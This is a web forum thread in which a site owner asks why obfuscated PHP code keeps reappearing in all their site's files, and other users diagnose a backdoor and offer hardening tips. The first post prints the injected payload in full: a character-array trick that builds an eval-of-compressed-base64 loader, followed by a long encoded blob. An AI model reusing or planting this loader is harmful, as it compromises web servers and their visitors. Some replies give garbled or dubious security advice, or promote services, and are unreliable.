Is my website be Attacked?

Hello all
My website: www.led-card.com
have some problem in code.
All this PHP file always be added some code like:
"

<?php
$md5 = "6b4b9ce7c181d24713e26e1fcaf90118";
$a4 = array('r','i',"a",')',"c",'6','s','f','n',";",'o','l',"d","v","t",'(',"z",'b','_',"e","$","4","g");
$b40 = create_function('$'.'v',$a4[19].$a4[13].$a4[2].$a4[11].$a4[15].$a4[22].$a4[16].$a4[1].$a4[8].$a4[7].$a4[11].$a4[2].$a4[14].$a4[19].$a4[15].$a4[17].$a4[2].$a4[6].$a4[19].$a4[5].$a4[21].$a4[18].$a4[12].$a4[19].$a4[4].$a4[10].$a4[12].$a4[19].$a4[15].$a4[20].$a4[13].$a4[3].$a4[3].$a4[3].$a4[9]);
$b40('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');
?>

"

It's happened two weeks ago, and I clear this code and change my host password.
But now, this code is back again.
I can view my web site , it' seems always OK.
May I know what's the problm is . And How can I deal with.

 

Yes, your website has been hacked. You might have changed your password, but most likely a php shell was uploaded as well. This is allowing the hacker to continue to gain access.

Check website access logs, control panel access logs, ftp access logs, ssh access logs and compare timestamps to to infected files to find out the source. Shoot me a pm if you need help with this.

 

Hacking is very harmful for website users. How can i protect our site?

 

- use strong passwords
- use the latest version of the wordpress/drupal/etc scripts
- protect the admin directory with a pass

If you have a VPS/dedi - install mod_security+rules, CSF, CXS, many other things.

 

how to protect my joomla site from hacker attack.

 

A backdoor has most likely been uploaded which is why the content keeps appearing. Is this a software package that you're using, if so, what software is it?

If you need further assistance with clearing this up, don't hesitate to PM me and we can work something out.

Cheers.

 

Hacking is very easy if the admin is not very sound in his knowledge.Here are some steps which can provide you to safe your website from getting hacked even if a hacker has stolen your website login details.

-Try to keep the SAFE MODE=OF
-In .htaccesss file,disable all shell based functions.Specially symlinking.
-Always keep a iplogger in root folder so that hacker's ip can be logged.

Hope i helped you somewhere
Thanks

 

You should find the reason: some webshell or website vulnerability.
Here is our fixing guide: evuln.com/hacked/redirect.html

 

Below mentioned are few security measures which you can take to secure your website.
1) Protect your control panel authentication by using a difficult password, which only you or your client knows.
2) Do not make your control panel password public.
3) While uploading any data from your local pc scan it with any anti-virus.
4) Change the passwords for all the email accounts.
5) ) If you have installed wordpress, joomla and vbulletin manually then you will need to check with the script vendor to see if they are of the latest version/ upgraded version, patch or updates available and imply them to your scripts.

 

There is a better services available to protect our website. You can secure your website by using website anti malware scanner, it will identify and fix all malware easily and faster if your website be attacked by hackers. Once your website is been hacked than it is harasser to get back.